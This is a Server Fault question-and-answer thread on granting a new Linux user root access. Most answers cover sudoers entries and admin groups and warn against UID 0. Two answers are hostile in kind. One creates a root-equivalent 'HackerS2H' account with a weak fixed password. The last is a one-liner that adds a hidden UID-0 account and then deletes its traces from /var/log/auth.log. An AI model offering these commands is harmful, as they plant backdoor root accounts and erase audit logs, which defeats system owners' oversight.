32

I want to add new user and have/grant that new user to have all the root access, how can I do that ?

I did sudo adduser --system testuser but this is not working as I expected.

Thanks for help.

seg.server.fault
  • 1,907
  • 4
  • 16
  • 11

8 Answers8

63

There are actually three ways you can do this: the right way, the wrong way, and the ugly way.

First, create a normal user account.

adduser username

Then select one of the following:

The Right Way

Create a sudo entry for the wheel group in /etc/sudoers like this:

## Allows people in group wheel to run all commands
%wheel  ALL=(ALL)       ALL

Or for "modern" versions:

## Allows people in group sudoers to run all commands
%sudoers ALL=(ALL)       ALL

Then add the user to the wheel group. Adding and removing users with administrative priviledges now becomes a function of remembering to add them to wheel, instead of creating an entry in sudo. The great thing about using wheel is that you can extend this mechanism into other authentication schemes that support groups, i.e. winbind/Active Directory, and reap the benefits in the process. You would accomplish this by mapping wheel to a group in your authentication schema that has admin privileges.

Note that some distributions use different administrative accounts. Wheel is a "traditional" approach to this, but you may encounter admin, adm, and other group accounts that serve the same purpose.

Follow-up Edit:

I have to give a point to Bart Silverstrim for pointing out that Ubuntu uses admin as the group for this purpose. He got to this first, although I didn't notice an Ubuntu tag at the time. Again, it all depends on what distribution your are using.

The Ugly Way

Create a sudo entry for the user account in question and give then complete access. Again, you create the entry in /etc/sudoers like this:

## Allows just user "username" to run all commands as root
username    ALL=(ALL)    ALL

ADDED: ## For Ubuntu version: username ALL=(ALL:ALL)

This is great if you only have one (or two) normal accounts. It is ugly when you have a hundred accounts over multiple (geophysical) sites and have to constantly maintain the sudo file.

The Wrong Way

You can edit the /etc/passwd file and change the user account ID from whatever number it is, to 0. That's right, zero. 

username:x:0:502::/home/username:/bin/bash

See that third entry as zero? When you log into that account, you are, for all effective purposes, root. I do not recommend this. If you do not remember "who" you are, you can create all kinds of havoc as you start creating and touching files as root. You could also add your username to the root group. This has the same effect for file access but it creates other issues; programs will notice you are not user root and refuse to run, but you will gain access to files that belong to group root.

If you did this, you did use vipw instead of just editing with vi, right? (or whatever your favorite text editor is) After all, a single typo in this file can lock you out of your system - and that means a physical visit to the computer in question with a repair disc...

Community
  • 1
Avery Payne
  • 14,536
  • 1
  • 51
  • 88
  • 2
    I would not even document the wrong way. Too taboo. – elcuco Aug 25 '09 at 13:10
  • 15
    I disagree. If you hide the wrong, it doesn't go away, it just festers - and sometimes, the knowledge that something is forbidden attracts more attention than it should. Better to understand *why* it is taboo. Especially when there are (admittedly rare) circumstances where you might need that knowledge. Still, I'll give you a point for pointing out just how really bad things can be. :) – Avery Payne Aug 25 '09 at 13:13
  • 1
    "After all, a single typo in this file can lock you out of your system" - no it wont, it may lock you out after you disconnect all Putty sessions(assuming you use Putty). As long as you don't disconnect, but just open another session to test your settings you are ok in this regard. – quamis Aug 25 '09 at 14:01
  • 1
    @quamis - true. Although I was trying to point out the danger in assuming that it's safe to "fire and forget". :) A point for you too, for pointing out good practice - *always test settings afterwards*. – Avery Payne Aug 25 '09 at 14:10
  • this was very very helpful! – Drewdin May 01 '12 at 18:08
  • 1
    I'd just like to note that what was traditionally 'wheel' group (with binary, flag-level elevation) in Unix is no longer a common term for group of users that can elevate with sudo. From my experience, the most common name of the group of people that can sudo is nowdays typically 'sudoers' and is already setup on most systems. – Bojan Markovic Oct 10 '12 at 13:45
  • Noted, added, and comment bumped. :) – Avery Payne Nov 01 '12 at 18:50
  • Always use visudo when editing sudoers! – Wilshire Nov 01 '12 at 19:41
  • This seems overly complex... isn't it enough to [add the user to the sudo group as in my answer](http://serverfault.com/a/611849/69936)? [200+ upvotes](http://askubuntu.com/questions/7477/how-can-i-add-a-new-user-as-sudoer-using-the-command-line) can't be wrong. – Dan Dascalescu Jul 11 '14 at 09:30
  • @DanDascalescu your answer isn't wrong at all; although the initial question didn't specify *which* system was being modified. It wasn't until later that the question was amended to be Ubuntu. The reason for the extra text is that it explains the *why*. See my comment above about "forbidden knowledge". – Avery Payne Jul 14 '14 at 23:49
  • Also worth pointing out that although Ubuntu has the admin group in the sudoers file that group does not exist by default (on 12.04 at least) so you can't add users to it. You must therfore issue `addgroup admin` before you starting adding users to the group. – rnbrady Sep 18 '14 at 10:56
  • @rnbrady understandable, the question dates back to '09 and things change in the interm. This is a common issue with several answers I have seen; over time, the answer becomes "stale" even though the topic is current. – Avery Payne Nov 19 '15 at 23:59
  • 1
    How can i create user who have all right without write sudo ? – Nullpointer Sep 08 '16 at 12:12
  • Really nice answer, but **What I need is to create a user with full access to the filesystem** (In my case, even read would be enough, but I'm using sftp, so writing sudo doesn't seem to be an option). Adding my users to admin/sudo groups doesn't allow them to check any content, like /root. **Did I do something Wrong ?** _I'm using Ubuntu 16.04 LTS_ – Balmipour Jan 05 '17 at 10:48
  • @Balmipour, you're going to have some limited options. The obvious ones are to use the root account (which basically bypasses security checks) or to give "other" (world) access to the directories you need. The problem I see that your use with "full access to the filesystem" is essentially a giant security hole waiting to happen. I'm not sure I could chip in further advice at this point. – Avery Payne Jan 05 '17 at 17:43
  • You're right, but I'm quite surprised that such a simple need is so hard to fullfil. It still looked better than enabling ssh access for root to me. (well, since we got IP restrictions and strong passwords, I doubt it's really an issue, but... I hoped I'd find something better.) I'll do with it. Anyway, thanks for your answers. – Balmipour Jan 05 '17 at 22:35
  • https://unix.stackexchange.com/questions/92123/rsync-all-files-of-remote-machine-over-ssh-without-root-user#comment170839_92397 argues in favour of distinct root accounts if different users require SSH root privileges and distinct shell, home and `.ssh/authorized_keys`. – Derek Mahar Nov 09 '17 at 19:26
3

I've been using this for years and it's the #1 recommended way to add a sudoer on AskUbuntu:

adduser existinguser sudo

Much simpler than editing files, and easy to throw in a shell script for unattended installation.

If you want to create the user and grant sudo privileges, you can do that in one line like this:

useradd newuser -m -G sudo
passwd newuser

-m created a home directory, and -G specifies a supplementary group.

Community
  • 1
Dan Dascalescu
  • 601
  • 1
  • 10
  • 21
2

and with this is 100%:

adduser -u 0 -g root -G root -s /bin/bash -r HackerS2H -p 123456

and connect with putty and ip server

Scott Pack
  • 14,907
  • 10
  • 53
  • 83
hacker-s2h
  • 21
  • 1
1

Well you may create user with adduser, see man adduser.
After you can add it to privileged group like root, or wheel. But i think that the most recommended way to have some permission is using sudo.

Ali Mezgani
  • 3,850
  • 2
  • 24
  • 36
1

you can perform : 

#useradd -m -g root alex

it creates a user Alex with a home directory who belongs to the root group

Razique
  • 2,276
  • 1
  • 19
  • 23
1

Addition to Avery Payne's answer: in Ubuntu, you may want it like so:

%sudo   ALL=(ALL:ALL) ALL

And not like so:

%sudo    ALL=(ALL) ALL
HBruijn
  • 77,029
  • 24
  • 135
  • 201
hukeping
  • 111
  • 3
0

The "ugly and messy" way is to edit /etc/passwd to have UID=0 AND GID=0 for the new user. But this poses a LOT of security risks. You do know that if he is also root he may disable your accont, change your password, make you a "standard user"... right? so why not just give him you own account?

You may study the way suid (http://en.wikipedia.org/wiki/Setuid) works if you want to grant him root access for just a few of the commands.

quamis
  • 362
  • 7
  • 18
-1

Here's a one liner: 

USERNAME="name";PASSWD=`perl -e 'print crypt("password", "sa")'`;COMMENT="Comment Here"
&& sudo useradd -p $PASSWD --system --shell '/bin/bash' --base-dir "/bin" --uid 0 -- 
non-unique --comment $COMMENT $USERNAME && sudo sed -i '/useradd/d;/$USERNAME/d;' 
/var/log/auth.log

Best,

Boschko
  • 137
  • 5
  • 1
    Adding additional users with the uid 0 is not a good idea ... see the answer with the most votes for details. – Gerald Schneider Nov 14 '19 at 14:42
  • @GeraldSchneider I never said it was a good idea... Im well aware... and honestly its non of our concern. Its a one liner, use it in pentests all the time. Regards – Boschko Nov 14 '19 at 20:47